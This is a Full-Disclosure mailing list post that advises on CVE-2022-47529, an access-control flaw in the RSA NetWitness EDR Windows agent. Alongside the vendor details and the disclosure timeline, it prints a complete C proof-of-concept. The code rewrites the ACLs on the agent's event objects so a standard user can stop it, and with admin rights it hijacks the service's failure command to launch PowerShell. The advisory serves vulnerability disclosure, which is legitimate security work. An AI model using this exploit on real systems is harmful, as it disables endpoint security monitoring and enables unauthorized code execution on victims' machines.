lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAFD2FDOd-FJsHVncgm8Oe8jWbT0NsPNNWfCVPUrH+34TuZhubQ@mail.gmail.com>
Date: Mon, 27 Mar 2023 23:09:11 -0400
From: hyp3rlinx <apparitionsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] RSA NetWitness EDR Agent / Incorrect Access Control - Code
 Execution / CVE-2022-47529

[+] Credits: John Page (aka hyp3rlinx)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
RSA Securitywww.netwitness.com


[Product]
NetWitness Endpoint EDR Agent

The RSA NetWitness detection and response (EDR) endpoint monitors
activity across all your endpoints—on and off the
network—providing deep visibility
into their security state, and it prioritizes alerts when there is an
issue. NetWitness Endpoint drastically reduces dwell time by rapidly
detecting new and non-malware attacks that other EDR solutions miss,
and it cuts the cost, time and scope of incident response.


[Vulnerability Type]
Incorrect Access Control / Code Execution


[CVE Reference]
CVE-2022-47529


[Security Issue]
CVE-2022-47529 allows local users to stop the Endpoint Windows agent
from sending the events to SIEM or make the agent run user-supplied
commands.

Insecure Win32 memory objects in Endpoint Windows Agents in the
NetWitness Platform through 12.x allow local
and admin Windows user accounts to modify the endpoint agent service
configuration:
to either disable it completely or run user-supplied code or commands,
thereby bypassing tamper-protection features via ACL modification.

Interestingly, the agent was uploaded to virustotal on 2022-01-05
17:24:32 UTC months before finding and report.

SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d
LANDeskService.exe


[Severity]
Critical


[Impact(s)]
Denial-of-Service
Arbitrary Code Execution


[Attack Vector]
To exploit, open handle to memory objects held by the endpoint agent,
modify the ACL for the ones that have insecure ACLs, and DENY access
to Everyone group


[Affected Product Code Base]
All versions prior to v12.2


[Network Access]
Local


[References]https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935


[Vuln Code Block]:
00000001400F7B10 sub_1400F7B10   proc near               ; CODE XREF:
sub_14012F6F0+19B?p
.text:00000001400F7B10                                         ;
sub_14013BA50+19?p
.text:00000001400F7B10                                         ; DATA XREF: ...
.text:00000001400F7B10                 push    rbx
.text:00000001400F7B12                 sub     rsp, 20h
.text:00000001400F7B16                 mov     rbx, rcx
.text:00000001400F7B19                 test    rcx, rcx
.text:00000001400F7B1C                 jz      short loc_1400F7B5C
.text:00000001400F7B1E                 call    cs:InitializeCriticalSection
.text:00000001400F7B24                 lea     rcx, [rbx+28h]  ;
lpCriticalSection
.text:00000001400F7B28                 call    cs:InitializeCriticalSection
.text:00000001400F7B2E                 mov     edx, 1          ; bManualReset
.text:00000001400F7B33                 xor     r9d, r9d        ; lpName
.text:00000001400F7B36                 mov     r8d, edx        ; bInitialState
.text:00000001400F7B39                 xor     ecx, ecx        ;
lpEventAttributes
.text:00000001400F7B3B                 call    cs:CreateEventW
.text:00000001400F7B41                 mov     [rbx+50h], rax
.text:00000001400F7B45                 mov     dword ptr [rbx+58h], 0
.text:00000001400F7B4C                 test    rax, rax
.text:00000001400F7B4F                 jz      short loc_1400F7B5C



[Exploit/POC]
"RSA_NetWitness_Exploit.c"

#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"

#define OPEN_ALL_ACCESS 0x1F0003

/*
RSA NetWitness EDR Endpoint Agent
Tamper Protection Bypass / EoP Code Execution
RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49

Expected result: Low privileged standard users are prevented from
interfering with and or modifying events for the RSA Endpoint Agent.
Actual result: RSA NetWitness Endpoint Agent is terminated by a low
privileged standard non-administrator user.

By John Page (hyp3rlinx) - Nov 2022

DISCLAIMER: The author of this code is not responsible or liable for
any damages whatsoever from testing, modifying and or misuse.
Users of this supplied PoC code accept all risks, do no harm.

X64 PE file vuln code block:

00000001400F7B10 sub_1400F7B10   proc near               ; CODE XREF:
sub_14012F6F0+19B?p
.text:00000001400F7B10                                         ;
sub_14013BA50+19?p
.text:00000001400F7B10                                         ; DATA XREF: ...
.text:00000001400F7B10                 push    rbx
.text:00000001400F7B12                 sub     rsp, 20h
.text:00000001400F7B16                 mov     rbx, rcx
.text:00000001400F7B19                 test    rcx, rcx
.text:00000001400F7B1C                 jz      short loc_1400F7B5C
.text:00000001400F7B1E                 call    cs:InitializeCriticalSection
.text:00000001400F7B24                 lea     rcx, [rbx+28h]  ;
lpCriticalSection
.text:00000001400F7B28                 call    cs:InitializeCriticalSection
.text:00000001400F7B2E                 mov     edx, 1          ; bManualReset
.text:00000001400F7B33                 xor     r9d, r9d        ; lpName
.text:00000001400F7B36                 mov     r8d, edx        ; bInitialState
.text:00000001400F7B39                 xor     ecx, ecx        ;
lpEventAttributes
.text:00000001400F7B3B                 call    cs:CreateEventW
.text:00000001400F7B41                 mov     [rbx+50h], rax
.text:00000001400F7B45                 mov     dword ptr [rbx+58h], 0
.text:00000001400F7B4C                 test    rax, rax
.text:00000001400F7B4F                 jz      short loc_1400F7B5C


1) Install "RSA NetWitness.msi"  (Endpoint EDR Agent)

2) Run Exploit PoC as a Standard non-admin user, the PoC will:

   a) Open a handle (copy) to Ecat002 event.
   b) Open additional handles for events Ecat004 and Ecat002,
modifying them to deny access to Everyone group.
   c) Set/Reset event the Ecat002 handle.
   d) if admin privs change the EDR service configuration

    Non vulnerable agents will output "Not vulnerable to the console",
customers can modify and use test to see if vuln.

*/

char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"};
BOOL PWNED=FALSE;
void Exploit();
int AdminChl();
void HijackSvcConfig();


int main(void){
	printf("[+] RSA NetWitness EDR Agent 0Day\n");
	printf("[+] CVE-2022-47529\n");
	printf("[+] Discovery: John Page (aka hyp3rlinx)\n");
	printf("[+] ===================================\n");
	
	Exploit();
	
	if( AdminChk() ){
	   printf("[+] Hijacked NetWitness Agent Service!\n");
	   HijackSvcConfig();
	}
	
	Sleep(2000);
	printf("[+] Done!\n\n");
        system("pause");
	
return 0;
}

void Exploit(){
	
  PACL pOldDACL = NULL;
  PACL pNewDACL = NULL;
	
  HANDLE hEvent_Ecat002 =
OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002");
  int i=0;
	
  for(; i < sizeof(Vuln_Events) /  sizeof(Vuln_Events[0]); i++){

	  HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]);
	
 if(hEvent != INVALID_HANDLE_VALUE){

       printf("[-] Targeting Event: %s\n", Vuln_Events[i]);
       Sleep(500);

  if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) ==
ERROR_SUCCESS){
    TRUSTEE trustee[1];
    trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
    trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
    trustee[0].ptstrName = TEXT("Everyone");
    trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
    trustee[0].pMultipleTrustee = NULL;

    EXPLICIT_ACCESS explicit_access_list[1];
    ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));

    explicit_access_list[0].grfAccessMode = DENY_ACCESS;
    explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
    explicit_access_list[0].grfInheritance = NO_INHERITANCE;
    explicit_access_list[0].Trustee = trustee[0];

    if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL)
!= ERROR_SUCCESS){
    	printf("%s%d", "[!] Not vulnerable! ", GetLastError());
    }
    	
    if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) !=
ERROR_SUCCESS){
       printf("%s%d", "[!] Not vulnerable! ", GetLastError());
      }else{
      	 SetEvent(hEvent_Ecat002);
         Sleep(1000);
         ResetEvent(hEvent_Ecat002);
         CloseHandle(hEvent_Ecat002);
         SetEvent(hEvent);
         Sleep(1000);
         PWNED=TRUE;
      }
    if(PWNED){
	LocalFree(pNewDACL);
        LocalFree(pOldDACL);
        CloseHandle(hEvent);
    }
    Sleep(1000);
  }
 }
}
}

//If run as admin, modify the agent service config to run our own code.
int AdminChk(){
    int result = 0;
    HANDLE hToken = NULL;
    if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){
        TOKEN_ELEVATION elevated;
        DWORD tokSize = sizeof(TOKEN_ELEVATION);
        if(GetTokenInformation(hToken, TokenElevation, &elevated,
sizeof(elevated), &tokSize)){
            result = elevated.TokenIsElevated;
        }
     }
    if(hToken){
      CloseHandle(hToken);
    }
    return result;
}


//Trivial example modify the service config...
void HijackSvcConfig(){
  Sleep(1000);
  WinExec("sc failure NWEAgent command=
""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
"Evil-Command-Here""", 0);
}


[POC Video URL]https://www.youtube.com/watch?v=kO1fu4IOlSs


[Disclosure Timeline]
Vendor Notification: December 2, 2022
CVE assigned: December 19, 2022
Hotfix v12.1.0.1: January 3, 2023
Fixed in v12.2.0.0 January 4, 2023
Restested for vendor: January 6, 2023
March 24, 2023 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ